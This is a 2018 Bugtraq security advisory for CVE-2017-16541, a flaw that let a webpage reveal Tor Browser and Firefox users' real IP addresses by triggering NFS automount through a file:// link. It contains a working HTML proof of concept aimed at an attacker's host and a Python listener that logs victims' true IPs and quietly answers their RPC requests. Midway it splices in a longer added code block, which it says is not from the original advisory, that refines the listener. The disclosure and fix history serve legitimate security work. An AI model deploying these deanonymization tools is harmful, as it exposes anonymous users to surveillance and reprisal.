CVE-2017-16541 details: Deanonymize Tor Browser Users with Automount
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: CVE-2017-16541 details: Deanonymize Tor Browser Users with Automount
- From: Filippo Cavallarin <filippo.cavallarin@xxxxxxxxxxxxxxxx>
- Date: Mon, 10 Sep 2018 15:06:49 +0200
Hi all,
here are the details for CVE-2017-16541 (Tor Browser information disclosure).
More info at:
https://www.wearesegment.com/research/tormoil-deanonymize-tor-browser-users-with-automount/
Tor Browser 7.0.8, and probably earlier versions, for Mac OS X and Linux is
affected by an information disclosure vulnerability that leads to full
de-anonymization of website visitors using just a single HTML tag. The
vulnerability also affects Firefox (versions prior to 62.0 / 60.2.0 ESR).
Vulnerability Details
The vulnerability exists because Firefox fails to prevent automount/autofs from
being triggered by a webpage through the file:// handler.
automount is a program that mounts NFS file systems on demand, the first time
their mount point is accessed. For example it can be configured so that
accessing /localdir on the client machine triggers an NFS connection to
test.com:/mydir.
automount can also be configured so that a path under /net/ names the remote
server and exported path: 'ls /net/test.com/a' triggers an NFS connection to
test.com. This is the default configuration on Mac OS X.
This behaviour can be triggered from a webpage in many ways through the file://
handler, for example with: <link href='file:///net/test.com/a.css'
rel='stylesheet'>.
NFS mounts are handled by the kernel, so the browser has no way to tunnel the
resulting connection through its proxy (Tor).
Notably, this vulnerability can be exploited even when JavaScript is disabled.
This vulnerability only affects Mac OS X users with the default configuration
and Linux users with the automount package installed and configured
accordingly.
PoC
To demonstrate this issue follow the steps below:
1. host an HTML page with the following content:
   <link href='file:///net/12.12.12.12/a.css' rel='stylesheet'>
2. run "tcpdump port 111"
3. load the previously hosted page into Tor Browser
4. watch the output of tcpdump: you should see UDP packets sent to 12.12.12.12
To exploit this vulnerability to deanonymize a Tor Browser user, an attacker
needs to host the malicious page on a server he/she owns, trick the victim into
loading the malicious page, and watch the output of tcpdump (running on the
web server).
The victim's browser will show a loading indicator until a successful NFS mount
is performed or until the NFS timeout is reached. As a result the victim may
notice that something unusual is happening. To prevent this the attacker has
(at least) two options:
1. configure an NFS server so the victim's machine completes the connection
   without waiting
2. listen for portmap requests (UDP port 111) and immediately reject the
   connection
The problem with the first option is that the mount point may remain visible
to the victim and may also leave traces in log files.
The second option involves some Python code that terminates RPC requests
gracefully:
import socket
import sys

BIND_ADDR = "0.0.0.0"
BIND_PORT = 111  # portmapper/rpcbind port; binding it requires root

sok = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
    sok.bind((BIND_ADDR, BIND_PORT))
except Exception as e:
    print(e)
    sys.exit(1)

print("Waiting for victims on UDP port %d\n" % BIND_PORT)
while True:
    data, addr = sok.recvfrom(1024)
    ip = addr[0]
    print("TRUE IP: %s" % ip)
    # Answer every datagram with an accepted RPC reply whose result is
    # "port 0": the portmapper's way of saying the requested program is
    # not registered, so the client gives up at once instead of waiting
    # for the NFS timeout. Layout: the 4-byte XID copied from the request,
    # 4-byte msg_type REPLY (1), then 20 zero bytes covering reply_stat
    # MSG_ACCEPTED, an empty verifier (flavor and length), accept_stat
    # SUCCESS and the port value 0.
    rpl = data[:4] + b"\x00\x00\x00\x01" + bytes(20)
    if not sok.sendto(rpl, addr):
        print("Error sending reply to %s" % ip)
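The responder above answers every datagram blindly. As an added example (this is not code from the original advisory), here is the Sun RPC exchange it relies on, decoded with Python's struct module: the PMAPPROC_GETPORT call the victim's kernel sends to UDP port 111, the 28-byte "port 0" reply, and a PROG_UNAVAIL alternative. The sample call, XID and addresses are constructed for the demonstration; the program numbers are the standard RPC registry values (100003 nfs, 100005 mountd, 100021 nlockmgr), and `handle_datagram` is a hypothetical drop-in for the body of the listener loop.

```python
import struct

# Sun RPC v2 (RFC 5531) and portmapper (RFC 1833) constants.
PMAP_PROG, PMAP_VERS, PMAPPROC_GETPORT = 100000, 2, 3
MSG_CALL, MSG_REPLY = 0, 1
MSG_ACCEPTED = 0
SUCCESS, PROG_UNAVAIL = 0, 1
# Programs an NFS client asks the portmapper about before mounting.
PROG_NAMES = {100003: "nfs", 100005: "mountd", 100021: "nlockmgr"}


def parse_getport_call(data):
    """Decode a PMAPPROC_GETPORT call. Returns its fields, or None when the
    datagram is not such a call (garbage, a reply, another procedure)."""
    if len(data) < 24:
        return None
    xid, mtype, rpcvers, prog, vers, proc = struct.unpack(">6I", data[:24])
    if (mtype, rpcvers, prog, vers, proc) != (MSG_CALL, 2, PMAP_PROG,
                                              PMAP_VERS, PMAPPROC_GETPORT):
        return None
    off = 24
    # Skip credential and verifier: opaque_auth = flavor, length, body padded to 4.
    for _ in range(2):
        if len(data) < off + 8:
            return None
        _flavor, length = struct.unpack(">II", data[off:off + 8])
        off += 8 + ((length + 3) & ~3)
    if len(data) < off + 16:
        return None
    want_prog, want_vers, proto, _port = struct.unpack(">4I", data[off:off + 16])
    return {"xid": xid, "prog": want_prog, "vers": want_vers, "proto": proto,
            "name": PROG_NAMES.get(want_prog, "prog %d" % want_prog)}


def build_getport_reply(xid, port=0):
    """Accepted, SUCCESS reply carrying a port. Port 0 means "not registered";
    this is byte-for-byte the 28-byte datagram the responder above sends."""
    return struct.pack(">7I", xid, MSG_REPLY, MSG_ACCEPTED, 0, 0, SUCCESS, port)


def build_prog_unavail_reply(xid):
    """Alternative: accept the call but report PROG_UNAVAIL (no result body)."""
    return struct.pack(">6I", xid, MSG_REPLY, MSG_ACCEPTED, 0, 0, PROG_UNAVAIL)


def build_getport_call(xid, prog, vers, proto=17):
    """Constructed sample of what the victim's kernel sends: AUTH_NULL
    credential and verifier (four zero words), then the mapping it wants."""
    return (struct.pack(">6I", xid, MSG_CALL, 2, PMAP_PROG, PMAP_VERS, PMAPPROC_GETPORT)
            + struct.pack(">4I", 0, 0, 0, 0)
            + struct.pack(">4I", prog, vers, proto, 0))


def handle_datagram(data, addr):
    """Per-datagram logic for the listener loop (hypothetical helper): returns
    (log line, reply bytes), with reply None for anything that is not a
    GETPORT call, so scanners and stray traffic are not answered."""
    call = parse_getport_call(data)
    if call is None:
        return ("ignored %d bytes from %s" % (len(data), addr[0]), None)
    line = "TRUE IP: %s asked for %s v%d (xid 0x%08x)" % (
        addr[0], call["name"], call["vers"], call["xid"])
    return (line, build_getport_reply(call["xid"], 0))


if __name__ == "__main__":
    sample = build_getport_call(0x1234ABCD, 100005, 3)  # constructed request
    print(handle_datagram(sample, ("203.0.113.7", 40000))[0])
```

Replying only to well-formed GETPORT calls, rather than to every datagram, also keeps the listener from echoing 28 bytes back to port scanners that probe UDP 111.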
Due to its nature, Tormoil can de-anonymize both visitors of hidden services
and visitors of regular Internet websites, and it can also be injected using
man-in-the-middle techniques (e.g. by a malicious exit node).
History
This vulnerability was discovered and reported to the Tor Project on
10-26-2017 and was fixed in a matter of days.
Tor Browser is based on Firefox, which was affected by the same vulnerability,
but since the Firefox team rated it as moderate it took longer to get fixed.
In the meantime the Tor Browser team applied a temporary fix to their browser
that prevents any access to file:// resources.
This was a perfectly coherent solution, since the focus of Tor Browser is the
user's anonymity. However this fix broke legitimate functionality of a
"normal" browser, so the Firefox team did not implement it.
Instead they worked for months on a blacklisting mechanism that filters out
"dangerous" paths and prevents automount from being triggered.
Solution
Update Tor Browser to version 7.0.9
Update Firefox to version 62.0 or 60.2.0 ESR
References
https://blog.torproject.org/tor-browser-709-released
https://www.wearesegment.com/research/tormoil-deanonymize-tor-browser-users-with-automount/
Credits
Filippo Cavallarin (filippo.cavallarin@xxxxxxxxxxxxxxxx)